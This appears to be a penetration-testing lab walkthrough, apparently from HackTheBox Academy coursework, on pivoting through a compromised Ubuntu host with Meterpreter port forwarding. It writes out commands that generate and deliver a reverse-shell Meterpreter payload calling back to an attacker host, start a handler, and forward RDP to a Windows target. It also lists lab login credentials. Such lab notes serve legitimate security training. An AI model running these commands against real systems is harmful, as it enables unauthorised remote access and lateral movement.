Skip to content

Meterpreter local port forwarding

Port forwarding can also be accomplished using Meterpreter's portfwd module. We can enable a listener on our attack host and request Meterpreter to forward all the packets received on this port via our Meterpreter session to a remote host on the network.


  • we have our Meterpreter shell access on the Ubuntu server (the pivot host)
  • we want to perform enumeration scans through the pivot host, but we would like to take advantage of the conveniences that Meterpreter sessions

tmux env setup

tmux setenv LOCAL
tmux setenv WIN_IP_NET_2

Step 1

Creating Payload for Ubuntu Pivot Host

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=$LOCAL -f elf -o shell.elf LPORT=4444

Configuring & Starting the multi/handler

msfconsole -q -x "use exploit/multi/handler; set payload linux/x64/meterpreter/reverse_tcp; set lhost $LOCAL; set lport 4444; exploit"

copy the shell.elf binary file to the Ubuntu pivot host over SSH

scp shell.elf ubuntu@$EXTERNAL_IP_OF_PIVOT_HOST:~/
|<- HTB_@cademy_stdnt!

execute shell.elf to gain a Meterpreter session

chmod +x shell.elf

Creating Local TCP Relay

portfwd add -l 3300 -p 3389 -r
The above command requests the Meterpreter session to start a listener on our Attack host's local port (-l) 3300 and forward all the packets to the remote (-r) Windows server on 3389 port (-p) via our Meterpreter session. Now, if we execute xfreerdp on our localhost:3300, we will be able to create a remote desktop session.

Connecting to Windows Target through localhost

xfreerdp /v:localhost:3300 /u:victor /p:pass@123

Netstat Output We can use Netstat to view information about the session we recently established. From a defensive perspective, we may benefit from using Netstat if we suspect a host has been compromised. This allows us to view any sessions a host has established.

netstat -antp